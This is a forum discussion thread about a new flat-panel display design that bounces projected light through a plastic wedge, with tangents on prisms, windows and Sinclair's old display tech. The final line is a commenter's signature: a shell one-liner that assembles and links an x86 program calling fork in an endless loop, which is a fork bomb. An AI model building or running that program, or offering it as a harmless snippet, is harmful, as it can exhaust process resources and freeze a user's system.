New LCD Flatscreen Concept: A Wedge of Plastic
SimianOverlord writes "The Register reports on an innovation in the field of flat panel LCD screens that promises cheaper screens with the same quality using existing manufacturing technology. A Flat Projection Display is created by bouncing light into a thin wedge of plastic from the bottom of the screen, at just the correct angle to allow the rebounded light to escape at the correct pixel. "We have to play around with the image to make sure that the pixels don't bunch up" explained Prof. Travis, the inventor. "If you don't do that the image can appear a little like an image reflected off water" The new technology has already attracted interest from a major TV maker, but don't expect them in your laptop until projector minaturization catches up."
I wonder if this could work with HUD or for display injection into a pair of glasses? That would be neat - to have the image in your glasses / windscreen!
***You learn something Every day. And then you die.***
You might call this a prism. The concept of bouncing light off of the inside edge of a prism is what happens in the pentaprism mirror inside a slr camera.
The big advantage that I can see with this is that a reasonable quality plastic wedge/prism should be much cheaper to replace when it gets damaged. I'm sure the initial cost will still be high, but the expensive stuff can be a little more protected.
eric
Cheap silicon wins again -- it's been supplanting copper, now optics.
"Glory is fleeting, but obscurity is forever." --Napoleon Bonaparte
They have developed an ill fitting sawtoothed double paned glass window that pushes more light further into the room, and less hits the area directly below the window, making offices lighter.
/angles were such that you got a perfect image.
This is basically doing the same but replacing light with a projector source.
Imagine a specially moulded radially displaced set of panes, that had a central gun firing at them in a 180 arc, and the timing
Make sense?
the viewing angle would have to be compensated a bit...
Check new scientist for the story on lighter windows.
#hostfile 0.0.0.0 primidi.com 0.0.0.0 www.primidi.com 0.0.0.0 radio.weblogs.com
Sorry to reply to my own post, but I thought I'd elaborate a little bit. I used to work for a company that sold a computer system along with some equipment they built. We hired a professional photographer come in and shoot photos of it in operation. He actually did a double exposure to make the LCD stand out more clearly. Took one shot with all the lights on, LCD off. Then he turned out the lights, turned the LCD on, and exposed the film again. Nice result. :)
"Derp de derp."
http://www.io2technology.com/dojo/178/v.jsp Free Space Display, Project the Images into the Air... No need for bulky Screens... Think it will work?
I read a funny review of the Z88 a long time ago. The Z88 had a small LCD display "bought from the Japanese", but that was the result of an epic battle inside Sinclair. Clive Sinclair himself was quoted as saying "LCD's are rubbish, we have the only real portable display technology". This was based on the Sinclair pocket TV, which bent electron beams through 90 degrees with a big magnet. The journalist writing the review said that he saw a demonstration and "you placed your chin on a rest, and saw a ghostly green four lines of twenty characters floating in the infinite distance."
There was a memorable conversation with Alan Sugar who bought the Sinclair
Reviewer: Do you have the rights to the Pandora display?
AS: We have the rights to all the Sinclair patents
R: Do you plan any products based on Pandora?
AS: Have you seen it?
R: Yes.
AS: Well then.
Oddly, no Pandora based products were ever produced.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;